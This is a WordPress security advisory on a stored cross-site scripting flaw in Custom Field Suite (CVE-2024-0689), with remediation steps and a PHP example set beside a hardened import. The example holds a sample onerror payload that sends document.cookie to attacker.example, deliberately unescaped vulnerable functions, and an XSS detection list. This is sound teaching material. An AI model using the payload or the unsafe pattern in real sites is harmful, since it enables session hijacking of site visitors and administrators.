Custom Field Suite <= 2.6.4 – Authenticated (Admin+) Stored Cross-Site Scripting
SeguridadWordPress.es, published 2024-02-28. Tag: CVE-2024-0689.

The Custom Field Suite plugin for WordPress is vulnerable to stored cross-site scripting via its metadata import in all versions up to and including 2.6.4, because metadata values are neither sufficiently sanitized on input nor escaped on output. This allows authenticated attackers with administrator-level permissions or higher to inject arbitrary web scripts into pages; the script executes every time a user visits an injected page. Only multisite installations and installations where unfiltered_html has been disabled are affected.

That scope is the important part of the advisory. On a single-site install an administrator already holds the unfiltered_html capability and may put raw HTML into any post, so "an admin can store a script" is not by itself a vulnerability. On multisite that capability belongs only to super admins, and the DISALLOW_UNFILTERED_HTML constant removes it from everyone; for those users WordPress core passes post content through its kses filters on save and strips script tags and event handlers. The import path skips that filtering, so a site administrator who is not trusted to publish raw HTML can still store a payload that later runs in the browser of anyone who views the page, including a super admin of the network.

To remediate, update Custom Field Suite to the latest available release (any version later than 2.6.4) as soon as possible. After updating, review metadata values that were imported while the vulnerable version was installed: a plugin update does not normally clean data that is already in the database. Beyond that, follow the usual hardening practice: keep the number of users with administrator permissions to a minimum, monitor site activity for suspicious behaviour, and make sure every administrator account uses a strong, unique password, rotated whenever compromise is suspected.

Keeping every WordPress plugin and theme up to date is essential to avoid vulnerabilities like this one. Security must remain a priority at all times to protect the integrity of your site and the data of your users.
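The bug class and the two remediation steps (fix the import, then sweep what the old version stored), as an added PHP example. This is not Custom Field Suite code and does not claim to show how that plugin is written: the function names, the meta-key schema, the sample import payload and the attacker.example host are invented for the illustration, and the fragment assumes it is loaded inside WordPress (for instance as an mu-plugin) because it uses update_post_meta(), current_user_can(), wp_kses_post(), esc_html() and $wpdb.

```php
<?php
/**
 * Hypothetical plugin fragment illustrating the bug class in this advisory.
 * NOT Custom Field Suite code: names, schema and payload are invented.
 * Assumes a WordPress runtime (update_post_meta, current_user_can, wp_kses_post,
 * esc_html, sanitize_text_field, $wpdb are all core WordPress APIs).
 */

// Allowlist of importable meta keys and how each one is meant to be rendered.
// Unknown keys are refused, so an import cannot create arbitrary meta.
const DEMO_META_SCHEMA = array(
	'demo_phone' => 'text', // plain text, never contains markup
	'demo_bio'   => 'html', // limited HTML, same rules as post content
);

// Constructed sample import, as a site admin WITHOUT unfiltered_html might
// submit it. The post editor would strip this; the vulnerable importer does not.
const DEMO_IMPORT_PAYLOAD = array(
	'demo_phone' => '+34 600 000 000',
	'demo_bio'   => 'Hi<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
);

/* --- Vulnerable pattern: store verbatim, echo raw ---------------------- */

function demo_import_meta_vulnerable( int $post_id, array $imported ): void {
	foreach ( $imported as $key => $value ) {
		// No sanitization: the onerror handler above is persisted byte-for-byte.
		update_post_meta( $post_id, $key, $value );
	}
}

function demo_render_meta_vulnerable( int $post_id, string $key ): void {
	// No output escaping: whatever sits in the database becomes markup.
	echo get_post_meta( $post_id, $key, true );
}

/* --- Hardened pattern: allowlist keys, sanitize on input, escape on output */

function demo_import_meta_hardened( int $post_id, array $imported ): array {
	if ( ! current_user_can( 'edit_post', $post_id ) ) {
		return array();
	}
	// On multisite only super admins hold unfiltered_html, and
	// DISALLOW_UNFILTERED_HTML removes it from everyone: exactly the installs
	// the advisory marks as affected. Mirror core's rule for post_content and
	// filter HTML for anyone who lacks the capability.
	$may_post_raw_html = current_user_can( 'unfiltered_html' );
	$stored            = array();

	foreach ( $imported as $key => $value ) {
		if ( ! array_key_exists( $key, DEMO_META_SCHEMA ) || ! is_scalar( $value ) ) {
			continue; // refuse unknown keys and nested structures
		}
		$value = (string) $value;
		if ( 'text' === DEMO_META_SCHEMA[ $key ] ) {
			$value = sanitize_text_field( $value ); // strips tags and control chars
		} elseif ( ! $may_post_raw_html ) {
			$value = wp_kses_post( $value );        // drops <script>, onerror=, javascript:
		}
		update_post_meta( $post_id, $key, $value );
		$stored[ $key ] = $value;
	}
	return $stored;
}

function demo_render_meta_hardened( int $post_id, string $key ): void {
	$value = (string) get_post_meta( $post_id, $key, true );
	$type  = array_key_exists( $key, DEMO_META_SCHEMA ) ? DEMO_META_SCHEMA[ $key ] : 'text';
	if ( 'html' === $type ) {
		// Re-filter on the way out as well: the row may have been written by
		// an older, vulnerable importer or by another plugin.
		echo wp_kses_post( $value );
	} else {
		echo esc_html( $value ); // inside an HTML attribute use esc_attr() instead
	}
}

/* --- Post-update check: find payloads the old version already stored ---- */

function demo_find_suspicious_meta(): array {
	global $wpdb;
	$needles = array( '<script', 'javascript:', 'onerror=', 'onload=', 'srcdoc=' );
	$hits    = array();
	foreach ( $needles as $needle ) {
		$rows = $wpdb->get_results(
			$wpdb->prepare(
				"SELECT post_id, meta_key FROM {$wpdb->postmeta} WHERE meta_value LIKE %s",
				'%' . $wpdb->esc_like( $needle ) . '%'
			),
			ARRAY_A
		);
		foreach ( $rows as $row ) {
			$hits[] = $row + array( 'needle' => $needle );
		}
	}
	return $hits; // empty array: no obvious payloads; otherwise review each row by hand
}
```

In a real plugin the keys would be declared with register_meta() and a sanitize_callback rather than the hand-rolled schema above, but the trust boundary is the same: sanitize according to the caller's unfiltered_html capability when the value is written, and escape for the output context when it is printed. To run the sweep on a test site after updating, load the file as an mu-plugin and call it through WP-CLI, e.g. `wp eval 'print_r( demo_find_suspicious_meta() );'`; `wp eval 'var_dump( current_user_can( "unfiltered_html" ) );' --user=<admin login>` tells you whether a given administrator is in the population the advisory describes (both commands assume WP-CLI is installed on the host).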